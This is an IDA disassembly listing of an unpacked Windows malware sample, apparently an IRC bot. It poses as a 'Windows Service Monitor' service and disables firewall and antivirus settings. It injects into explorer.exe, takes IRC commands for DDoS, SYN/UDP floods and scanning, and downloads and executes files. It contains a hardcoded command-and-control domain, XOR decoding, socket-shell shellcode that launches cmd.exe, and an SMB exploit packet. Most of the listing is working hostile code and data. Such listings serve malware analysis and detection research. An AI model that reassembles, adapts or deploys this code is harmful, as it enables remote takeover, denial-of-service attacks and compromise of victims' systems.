;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BB70A6F6DD1770581F42F2D1040B849B
; File Name : u:\work\bb70a6f6dd1770581f42f2d1040b849b_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 600000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
MEW segment para public 'BSS' use32
assume cs:MEW
;org 601000h
assume es:nothing, ss:nothing, ds:MEW, fs:nothing, gs:nothing
dword_601000 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherAdword_601004 dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceA ; sub_602804+24�r ...
dword_601008 dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerA ; sub_602804+E�r ...
dword_60100C dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandle ; sub_602804+42�r ...
dword_601010 dd 77E37311h ; resolved to->ADVAPI32.DeleteServicedword_601014 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatusdword_601018 dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_60101C dd 77E36CC9h ; resolved to->ADVAPI32.ChangeServiceConfigAdword_601020 dd 77DEB635h ; resolved to->ADVAPI32.ControlServicedword_601024 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_6034D2+E7�r ...
dword_601028 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA ; sub_6034D2+C3�r ...
dword_60102C dd 77DFD5BBh ; resolved to->ADVAPI32.RegCreateKeyA ; sub_6034D2+A8�r ...
dword_601030 dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_601034 dd 77E36F61h ; resolved to->ADVAPI32.ChangeServiceConfig2A ; sub_60272B+C4�r
dword_601038 dd 77DF3238h ; resolved to->ADVAPI32.StartServiceAdword_60103C dd 77E37071h ; resolved to->ADVAPI32.CreateServiceA dd 0
dword_601044 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_601048 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_60104C dd 7C80EA1Bh ; resolved to->KERNEL32.OpenMutexAdword_601050 dd 7C81042Ch ; resolved to->KERNEL32.CreateRemoteThreaddword_601054 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemory ; sub_60383E+D4�r
dword_601058 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocExdword_60105C dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_601060 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileAdword_601064 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_601068 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_60492B+2E�r
dword_60106C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_60492B+E�r
dword_601070 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_60383E+19�r ...
dword_601074 dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeAdword_601078 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_60107C dd 7C82C2D3h ; resolved to->KERNEL32.GetLogicalDriveStringsAdword_601080 dd 7C80EDD7h ; resolved to->KERNEL32.FindClosedword_601084 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileAdword_601088 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_60108C dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_601090 dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFreedword_601094 dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAllocdword_601098 dd 7C8608FFh ; resolved to->KERNEL32.GetTempFileNameAdword_60109C dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_6010A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_60383E+6�r
dword_6010A4 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_6010A8 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_6010AC dd 7C834E64h ; resolved to->KERNEL32._lclosedword_6010B0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_603B4B+7�r ...
dword_6010B4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_60383E+54�r ...
dword_6010B8 dd 7C830D74h ; resolved to->KERNEL32.lstrcmpA ; sub_602D3E+C3�r ...
dword_6010BC dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresentdword_6010C0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_6037CF+67�r ...
dword_6010C4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_603AF7+25�r ...
dword_6010C8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_6010CC dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_602928+159�r ...
dword_6010D0 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_6010D4 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_6034D2+286�r
dword_6010D8 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_6010DC dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; sub_603B4B+DC�r ...
dword_6010E0 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_6026A5+6E�r ...
align 8
dword_6010E8 dd 71A6EA82h align 10h
dword_6010F0 dd 7E418D2Bh ; resolved to->USER32.CharUpperA ; sub_603F01+A0�r
dword_6010F4 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_602928+10C�r ...
dd 0
dword_6010FC dd 71AB2B66h ; resolved to->WS2_32.ntohsdword_601100 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_6044D2+16F�r ...
dword_601104 dd 71AB4489h ; resolved to->WS2_32.WSAIoctldword_601108 dd 71AC1028h ; resolved to->WS2_32.acceptdword_60110C dd 71AB4519h ; resolved to->WS2_32.ioctlsocketdword_601110 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_603C3B+2A2�r
dword_601114 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_601118 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_6030CA+2B7�r ...
dword_60111C dd 71AB8769h ; resolved to->WS2_32.WSASocketA ; sub_60424F+114�r
dword_601120 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_602D3E+2B0�r
dword_601124 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_603C3B+60�r ...
dword_601128 dd 71AB3EA1h ; resolved to->WS2_32.setsockoptdword_60112C dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_603C3B+1D2�r ...
dword_601130 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_602928+142�r ...
dword_601134 dd 71AB951Eh ; resolved to->WS2_32.getsockname ; sub_6044D2+21�r
dword_601138 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_603C3B+1FE�r
dword_60113C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_6044D2+EA�r ...
dword_601140 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_6030CA+F5�r ...
dword_601144 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_601148 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_6044D2+63�r
dword_60114C dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_60424F+7B�r
dword_601150 dd 71AB88D3h ; resolved to->WS2_32.listen align 10h
aCWindowsSystem db 'C:\WINDOWS\system32\winsvcmon.exe',0 ; DATA XREF: sub_6026A5+9�o
; sub_6026A5+19�o ...
align 4
dd 39h dup(0)
dword_601268 dd 0 ; sub_602D3E+256�r ...
dword_60126C dd 0 ; sub_602928+83�r ...
dword_601270 dd 0 ; sub_602928+1A�w ...
dword_601274 dd 0 ; sub_602928+52�w ...
dword_601278 dd 80h dup(0) ; sub_602928+122�o ...
dword_601478 dd 4 dup(0) ; sub_602D3E+189�o ...
dword_601488 dd 8 dup(0) ; sub_602928+15F�o ...
word_6014A8 dw 0 ; DATA XREF: sub_602928+2A�w
; sub_602928+4C�w ...
align 4
dword_6014AC dd 0 ; sub_602928+11C�r ...
dword_6014B0 dd 0 ; sub_604422+73�w ...
align 8
byte_6014B8 db 0 ; DATA XREF: sub_604422+F�w
; sub_604422+44�o ...
align 4
dd 1Fh dup(0)
dword_601538 dd 0 ; sub_6030CA+297�r
dword_60153C dd 0 ; sub_602D3E+2A4�r ...
dword_601540 dd 0 ; sub_602928+DB�r ...
dd 7 dup(0)
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_6026A5+58�o
; sub_602853+9�o ...
align 4
dd 3Dh dup(0)
aD: ; DATA XREF: sub_6030CA+2F3�o
; sub_60383E+37�o ...
unicode 0, <d>,0
unicode 0, <h>,0
db '¼',7,0
align 4
dd 5C8h
dword_601680 dd 44h ; sub_602853+2F�w ...
dd 0Ah dup(0)
dword_6016AC dd 81h word_6016B0 dw 0 ; DATA XREF: sub_602853+43�w
align 4
dd 4 dup(0)
; ---------------------------------------------------------------------------
loc_6016C4: ; DATA XREF: sub_60383E+A7�o
jmp short loc_6016F3
; ---------------------------------------------------------------------------
loc_6016C6: ; CODE XREF: MEW:loc_6016F3�p
push 0FFFFFFFFh
; ---------------------------------------------------------------------------
db 68h
dword_6016CC dd 4 db 0B8h
dword_6016D1 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject db 0FFh, 0D0h, 68h
dword_6016D8 dd 4 db 0B8h
dword_6016DD dd 7C809B47h ; resolved to->KERNEL32.CloseHandle db 0FFh, 0D0h, 0B8h
dword_6016E4 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA dd 6AD0FFh
db 0B8h
dword_6016ED dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess; ---------------------------------------------------------------------------
call eax
loc_6016F3: ; CODE XREF: MEW:loc_6016C4�j
call loc_6016C6
; ---------------------------------------------------------------------------
dd 0
dword_6016FC dd 1 ; sub_6030CA+25A�w ...
dword_601700 dd 1 ; sub_603AF7+C�w ...
dword_601704 dd 1 ; sub_604422+81�w ...
off_601708 dd offset aOper?? ; DATA XREF: MEW:off_601740�o
; "OPER ?* ?* *"
dd 0
off_601710 dd offset a?login ; DATA XREF: MEW:00601744�o
; "* :?login * *"
dd offset a?Syn ; "* :?*syn* *"
dd offset a?Udp ; "* :?*udp* *"
dd offset a?Ddos ; "* :?*ddos* *"
dd offset aPass? ; "PASS ?* "
align 8
off_601728 dd offset a_332? ; DATA XREF: MEW:00601748�o
; "*:*.* 332 * #* :?* *"
dd offset a?Scan ; "* :?*scan* *"
dd offset aPrivmsg? ; "*PRIVMSG * :?* *"
dd offset aUser? ; "USER ?* "
dd offset aJoin ; "JOIN #* *"
align 10h
off_601740 dd offset off_601708 ; DATA XREF: sub_60481B+4F�r
; sub_60481B+65�r
dd offset off_601710
dd offset off_601728
align 10h
loc_601750: ; DATA XREF: sub_60265F+4�o
mov edx, 601180h
mov ecx, 5D0h
call sub_60176E
mov edx, offset byte_601777
mov ecx, 3799h
push offset sub_602614
; =============== S U B R O U T I N E =======================================
sub_60176E proc near ; CODE XREF: MEW:0060175A�p
; sub_60176E+4�j
xor byte ptr [edx], 5Dh
inc edx
loop sub_60176E
retn 8
sub_60176E endp
; ---------------------------------------------------------------------------
byte_601777 db 0 ; DATA XREF: MEW:0060175F�o
dword_601778 dd 32312E25h, 255C7338h, 7334362Eh, 0aAj74mj33o_v46s db 'aj74mj33o.v46suer0dszx.info',0 ; DATA XREF: sub_602928+E�o
; sub_602928:loc_602964�o
word_6017A4 dw 0FA71h ; DATA XREF: sub_602928+46�r
byte_6017A6 db 2Eh ; DATA XREF: sub_602D3E+12C�r
; sub_603437+31�r
byte_6017A7 db 21h ; DATA XREF: sub_602D3E+14B�r
; sub_603437+50�r
aAj74mj33o_v4_0 db 'aj74mj33o.v46suer0dszx.info',0 ; DATA XREF: sub_602928+1A�o
word_6017C4 dw 0FA71h ; DATA XREF: sub_602928+24�r
align 4
dword_6017C8 dd 337623h ; sub_602D3E+352�o ...
a9yc8b2ni db '9yc8b2ni',0 ; DATA XREF: sub_602D3E+34D�o
align 4
aGm2ud36_0 db 'gm2ud36',0 ; DATA XREF: sub_602928+52�o
aGm2ud36 db 'gm2ud36',0 ; DATA XREF: sub_602928+30�o
dword_6017E8 dd 12Ch dword_6017EC dd 2D3376h dword_6017F0 dd 402E212Ah, 2EhaWinsvcmon_0 db 'winsvcmon',0 ; DATA XREF: sub_6037CF+18�o
; sub_6037CF+3E�o
align 4
aWinsvcmon_exe db 'winsvcmon.exe',0 ; DATA XREF: sub_6026A5+14�o
align 4
aWinsvcmon db 'winsvcmon',0 ; DATA XREF: sub_602614+1E�o
; sub_60272B+1A�o ...
align 10h
aWindowsService db 'Windows Service Monitor',0 ; DATA XREF: sub_60272B+52�o
aMonitorsAndVer db 'Monitors and verifies integrity of all vital Windows services. If'
; DATA XREF: sub_60272B+A0�o
db ' this service is stopped, service management will be unavailable.'
db ' If this service is disabled, any services that explicitly depend'
db ' on it will fail to start.',0
align 4
aNick_24s db 'NiCK %.24s',0Ah,0 ; DATA XREF: sub_602928+164�o
; sub_602D3E+19E�o
aUserLLLL db 'USeR l l l l',0Ah,0 ; DATA XREF: sub_602928+137�o
align 4
aPass_32s db 'PaSS %.32s',0Ah,0 ; DATA XREF: sub_602928+102�o
aPrivmsg_16s_48 db 'PRiVMSG %.16s :%.480s',0Ah,0 ; DATA XREF: sub_602CF3+11�o
align 4
aJoin_16s_16s db 'JOiN %.16s %.16s',0Ah,0 ; DATA XREF: sub_602D3E+357�o
align 4
aUserhost_16s db 'USeRHOST %.16s',0Ah,0 ; DATA XREF: sub_602D3E+31C�o
a001 db '001',0 ; DATA XREF: sub_602D3E:loc_60302C�o
a302 db '302',0 ; DATA XREF: sub_602D3E:loc_602F7E�o
a332 db '332',0 ; DATA XREF: sub_602D3E:loc_602F12�o
a433 db '433',0 ; DATA XREF: sub_602D3E:loc_602EA5�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_602D3E:loc_602DF9�o
aPong_500s db 'PoNG %.500s',0Dh,0Ah,0 ; DATA XREF: sub_602D3E+85�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_602D3E:loc_602DAE�o
align 4
aExec db '[exec] :(',0 ; DATA XREF: sub_6030CA:loc_6033F2�o
align 4
aExec_0 db '[exec] :)',0 ; DATA XREF: sub_6030CA+31C�o
align 4
aNi_16s_16s db '[ni] %.16s %.16s',0 ; DATA XREF: sub_6030CA+2C5�o
align 4
a_500s db '%.500s',0Ah,0 ; DATA XREF: sub_6030CA+1E1�o
aQuit db 'QUiT',0Ah,0 ; DATA XREF: sub_6030CA+DE�o
align 4
a_8s08x db '%.8s%08x',0 ; DATA XREF: sub_6034AE+F�o
align 4
aSharedaccess db 'sharedaccess',0 ; DATA XREF: sub_6034D2+29D�o
align 4
aSDebugDcpromo_ db '%s\debug\dcpromo.log',0 ; DATA XREF: sub_6034D2+252�o
align 4
aSoftwarePoli_0 db 'software\policies\microsoft\windowsfirewall\standardprofile',0
; DATA XREF: sub_6034D2+205�o
aEnablefirewall db 'enablefirewall',0 ; DATA XREF: sub_6034D2+1EA�o
; sub_6034D2+222�o
align 4
aSoftwarePolici db 'software\policies\microsoft\windowsfirewall\domainprofile',0
; DATA XREF: sub_6034D2+1CD�o
align 4
aFirewalldisa_0 db 'firewalldisableoverride',0 ; DATA XREF: sub_6034D2+1B2�o
aFirewalldisabl db 'firewalldisablenotify',0 ; DATA XREF: sub_6034D2+197�o
align 4
aAntivirusoverr db 'antivirusoverride',0 ; DATA XREF: sub_6034D2+17C�o
align 4
aAntivirusdisab db 'antivirusdisablenotify',0 ; DATA XREF: sub_6034D2+161�o
align 10h
aSoftwareMicr_0 db 'software\microsoft\security center',0 ; DATA XREF: sub_6034D2+144�o
align 4
aAutosharewks db 'autosharewks',0 ; DATA XREF: sub_6034D2+129�o
align 4
aAutoshareserve db 'autoshareserver',0 ; DATA XREF: sub_6034D2+10E�o
aSystemCurren_0 db 'system\currentcontrolset\services\lanmanserver\parameters',0
; DATA XREF: sub_6034D2+F1�o
align 10h
aRestrictanon_0 db 'restrictanonymoussam',0 ; DATA XREF: sub_6034D2+D6�o
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_6034D2+BB�o
align 4
aSystemCurrentc db 'system\currentcontrolset\control\lsa',0 ; DATA XREF: sub_6034D2+9E�o
align 4
aEnabledcom db 'enabledcom',0 ; DATA XREF: sub_6034D2+83�o
align 10h
aSoftwareMicros db 'software\microsoft\ole',0 ; DATA XREF: sub_6034D2+6A�o
align 4
aN: ; DATA XREF: sub_6034D2+9�o
unicode 0, <n>,0
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_60383E+4D�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_603ABE+1D�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_603ABE+9�o
align 10h
aFindfile_256s_ db '[findfile] %.256s%.240s',0 ; DATA XREF: sub_6040D9+D0�o
a_256s_250s db '%.256s%.250s\',0 ; DATA XREF: sub_6040D9+8C�o
align 4
a__ db '..',0 ; DATA XREF: sub_6040D9+6A�o
align 4
a_: ; DATA XREF: sub_6040D9+54�o
; sub_6048A6+45�o
unicode 0, <.>,0
a_256s db '%.256s*',0 ; DATA XREF: sub_6040D9+C�o
aComspecQ db '"%comspec%" /Q',0 ; DATA XREF: sub_60424F+18F�o
align 4
aJoin db 'JOIN #* *',0 ; DATA XREF: MEW:00601738�o
align 4
aUser? db 'USER ?* ',0 ; DATA XREF: MEW:00601734�o
align 10h
aPrivmsg? db '*PRIVMSG * :?* *',0 ; DATA XREF: MEW:00601730�o
align 4
a?Scan db '* :?*scan* *',0 ; DATA XREF: MEW:0060172C�o
align 4
a_332? db '*:*.* 332 * #* :?* *',0 ; DATA XREF: MEW:off_601728�o
align 4
aPass? db 'PASS ?* ',0 ; DATA XREF: MEW:00601720�o
align 4
a?Ddos db '* :?*ddos* *',0 ; DATA XREF: MEW:0060171C�o
align 4
a?Udp db '* :?*udp* *',0 ; DATA XREF: MEW:00601718�o
a?Syn db '* :?*syn* *',0 ; DATA XREF: MEW:00601714�o
a?login db '* :?login * *',0 ; DATA XREF: MEW:off_601710�o
align 10h
aOper?? db 'OPER ?* ?* *',0 ; DATA XREF: MEW:off_601708�o
align 10h
a_16sHu_16sHu_2 db '[%.16s:%hu->%.16s:%hu] "%.256s"',0 ; DATA XREF: sub_6044D2+314�o
dword_601D40 dd 0 aDl08xDl db '[dl:%08x] :( dl',0 ; DATA XREF: sub_60492B+16F�o
aDl08xExec db '[dl:%08x] :( exec',0 ; DATA XREF: sub_60492B+140�o
align 4
aDl08x db '[dl:%08x] :)',0 ; DATA XREF: sub_60492B+103�o
align 4
aDl08x_180sTo_1 db '[dl:%08x] %.180s to %.180s',0 ; DATA XREF: sub_60492B+8A�o
align 4
aUrldownloadtof db 'URLDownloadToFileA',0 ; DATA XREF: sub_60492B+23�o
align 4
aUrlmon_dll db 'urlmon.dll',0 ; DATA XREF: sub_60492B+9�o
align 8
; =============== S U B R O U T I N E =======================================
sub_601DB8 proc near ; DATA XREF: sub_604D9C+61�o
var_1004 = dword ptr -1004h
var_1000 = dword ptr -1000h
var_FFC = dword ptr -0FFCh
; FUNCTION CHUNK AT 00601DC3 SIZE 0000006B BYTES
add esp, 0FFFFEFFFh
inc esp
jmp short loc_601DC3
sub_601DB8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_601DC1 proc near ; CODE XREF: sub_601DB8:loc_601DC3�p
; FUNCTION CHUNK AT 00601E2E SIZE 00000121 BYTES
jmp short loc_601E2E
sub_601DC1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_601DB8
loc_601DC3: ; CODE XREF: sub_601DB8+7�j
call sub_601DC1
push ebx
push ebp
push esi
push edi
mov ebp, [esp+1014h+var_FFC]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_601DE1: ; CODE XREF: sub_601DB8+46�j
jecxz short loc_601E15
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
cld
loc_601DEC: ; CODE XREF: sub_601DB8+40�j
xor eax, eax
lodsb
cmp al, ah
jz short loc_601DFA
ror edi, 0Dh
add edi, eax
jmp short loc_601DEC
; ---------------------------------------------------------------------------
loc_601DFA: ; CODE XREF: sub_601DB8+39�j
cmp edi, [esp+1014h+var_1000]
jnz short loc_601DE1
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
jmp short loc_601E17
; ---------------------------------------------------------------------------
loc_601E15: ; CODE XREF: sub_601DB8:loc_601DE1�j
xor eax, eax
loc_601E17: ; CODE XREF: sub_601DB8+5B�j
pop edi
pop esi
pop ebp
pop ebx
mov [esp+1004h+var_1000], eax
mov eax, [esp+1004h+var_1004]
mov [esp+1004h+var_FFC], eax
mov eax, [esp+1004h+var_1000]
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_601DB8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_601DC1
loc_601E2E: ; CODE XREF: sub_601DC1�j
pop esi
push 30h
pop ecx
mov ebx, fs:[ecx]
mov ebx, [ebx+0Ch]
mov ebx, [ebx+1Ch]
mov ebx, [ebx]
mov edi, [ebx+8]
sub esp, 1Ch
mov ebp, esp
xor eax, eax
push eax
push 6578652Eh
mov [ebp+14h], esp
push edi
push 0E88A49EAh
call esi
push 6
push dword ptr [ebp+14h]
call eax
mov [ebp+4], eax
push edi
push 0E9238ADBh
call esi
mov [ebp+0Ch], eax
push edi
push 0EC0E4E8Eh
call esi
xor ecx, ecx
mov cx, 6C6Ch
push ecx
push 642E3233h
push 5F327377h
push esp
call eax
mov ebx, eax
push ebx
push 0E71819B6h
call esi
mov [ebp+10h], eax
push ebx
push 79C679E7h
call esi
mov [ebp+18h], eax
push ebx
push 492F0B6Eh
call esi
push 6
push 1
push 2
call eax
mov [ebp+8], eax
xor eax, eax
push eax
push eax
push eax
mov eax, 427FF02h
xor ah, 0FFh
push eax
mov eax, esp
push 10h
push eax
push dword ptr [ebp+8]
push ebx
push 0C7701AA4h
call esi
call eax
pop eax
push ebx
push 0E92EADA4h
call esi
push 10h
push dword ptr [ebp+8]
call eax
xor eax, eax
push eax
push eax
push dword ptr [ebp+8]
push ebx
push 498649E5h
call esi
call eax
mov ecx, [ebp+8]
mov [ebp+8], eax
push ecx
call dword ptr [ebp+18h]
add esp, 0FFFFFEFCh
mov ebx, esp
loc_601F07: ; CODE XREF: sub_601DC1+15F�j
xor ecx, ecx
push ecx
mov cl, 0FFh
push ecx
push ebx
push dword ptr [ebp+8]
call dword ptr [ebp+10h]
test eax, eax
jle short loc_601F22
push eax
push ebx
push dword ptr [ebp+4]
call dword ptr [ebp+0Ch]
jmp short loc_601F07
; ---------------------------------------------------------------------------
loc_601F22: ; CODE XREF: sub_601DC1+155�j
push dword ptr [ebp+8]
call dword ptr [ebp+18h]
push edi
push 0DD1A4C5Bh
call esi
push dword ptr [ebp+4]
call eax
xor eax, eax
push eax
push dword ptr [ebp+14h]
push edi
push 0E8AFE98h
call esi
call eax
push edi
push 60E0CEEFh
call esi
call eax
; END OF FUNCTION CHUNK FOR sub_601DC1
; ---------------------------------------------------------------------------
db 0
dword_601F50 dd 197h ; sub_604D9C+4C�r ...
dword_601F54 dd 182h ; sub_604CA5+50�r ...
; =============== S U B R O U T I N E =======================================
sub_601F58 proc near ; DATA XREF: sub_604CA5+2E�o
var_1004 = dword ptr -1004h
var_1000 = dword ptr -1000h
var_FFC = dword ptr -0FFCh
; FUNCTION CHUNK AT 00601F65 SIZE 0000006B BYTES
add esp, 0FFFFEFFFh
inc esp
mov ebp, esp
jmp short loc_601F65
sub_601F58 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_601F63 proc near ; CODE XREF: sub_601F58:loc_601F65�p
; FUNCTION CHUNK AT 00601FD0 SIZE 0000010A BYTES
jmp short loc_601FD0
sub_601F63 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_601F58
loc_601F65: ; CODE XREF: sub_601F58+9�j
call sub_601F63
push ebx
push ebp
push esi
push edi
mov ebp, [esp+1014h+var_FFC]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_601F83: ; CODE XREF: sub_601F58+48�j
jecxz short loc_601FB7
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
cld
loc_601F8E: ; CODE XREF: sub_601F58+42�j
xor eax, eax
lodsb
cmp al, ah
jz short loc_601F9C
ror edi, 0Dh
add edi, eax
jmp short loc_601F8E
; ---------------------------------------------------------------------------
loc_601F9C: ; CODE XREF: sub_601F58+3B�j
cmp edi, [esp+1014h+var_1000]
jnz short loc_601F83
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
jmp short loc_601FB9
; ---------------------------------------------------------------------------
loc_601FB7: ; CODE XREF: sub_601F58:loc_601F83�j
xor eax, eax
loc_601FB9: ; CODE XREF: sub_601F58+5D�j
pop edi
pop esi
pop ebp
pop ebx
mov [esp+1004h+var_1000], eax
mov eax, [esp+1004h+var_1004]
mov [esp+1004h+var_FFC], eax
mov eax, [esp+1004h+var_1000]
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_601F58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_601F63
loc_601FD0: ; CODE XREF: sub_601F63�j
xor eax, eax
add eax, fs:[eax+30h]
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov edi, [eax+8]
pop esi
xor eax, eax
push eax
push 6578652Eh
mov [ebp+14h], esp
push edi
push 0E88A49EAh
call esi
push 6
push dword ptr [ebp+14h]
call eax
mov [ebp+4], eax
push edi
push 0E9238ADBh
call esi
mov [ebp+0Ch], eax
push edi
push 0EC0E4E8Eh
call esi
xor ecx, ecx
mov cx, 6C6Ch
push ecx
push 642E3233h
push 5F327377h
push esp
call eax
mov ebx, eax
push ebx
push 0E71819B6h
call esi
mov [ebp+10h], eax
push ebx
push 79C679E7h
call esi
mov [ebp+18h], eax
push ebx
push 492F0B6Eh
call esi
push 6
push 1
push 2
call eax
mov [ebp+0], eax
xor eax, eax
push eax
push eax
push eax
mov eax, 427FF02h
xor ah, 0FFh
push eax
mov eax, esp
push 10h
push eax
push dword ptr [ebp+0]
push ebx
push 0C7701AA4h
call esi
call eax
push eax
push ebx
push 0E92EADA4h
call esi
push dword ptr [ebp+0]
call eax
push eax
push eax
push dword ptr [ebp+0]
push ebx
push 498649E5h
call esi
call eax
mov [ebp+0], eax
add esp, 0FFFFFEFCh
mov ebx, esp
loc_602098: ; CODE XREF: sub_601F63+14E�j
xor ecx, ecx
push ecx
mov cl, 0FFh
push ecx
push ebx
push dword ptr [ebp+0]
call dword ptr [ebp+10h]
test eax, eax
jle short loc_6020B3
push eax
push ebx
push dword ptr [ebp+4]
call dword ptr [ebp+0Ch]
jmp short loc_602098
; ---------------------------------------------------------------------------
loc_6020B3: ; CODE XREF: sub_601F63+144�j
push edi
push 0DD1A4C5Bh
call esi
push dword ptr [ebp+4]
call eax
xor eax, eax
push eax
push dword ptr [ebp+14h]
push edi
push 0E8AFE98h
call esi
call eax
push edi
push 60E0CEEFh
call esi
call eax
; END OF FUNCTION CHUNK FOR sub_601F63
; ---------------------------------------------------------------------------
dw 0
align 10h
unk_6020E0 db 81h ; ; DATA XREF: sub_604B25+38�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
align 10h
dword_602130 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_604B25+4A�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
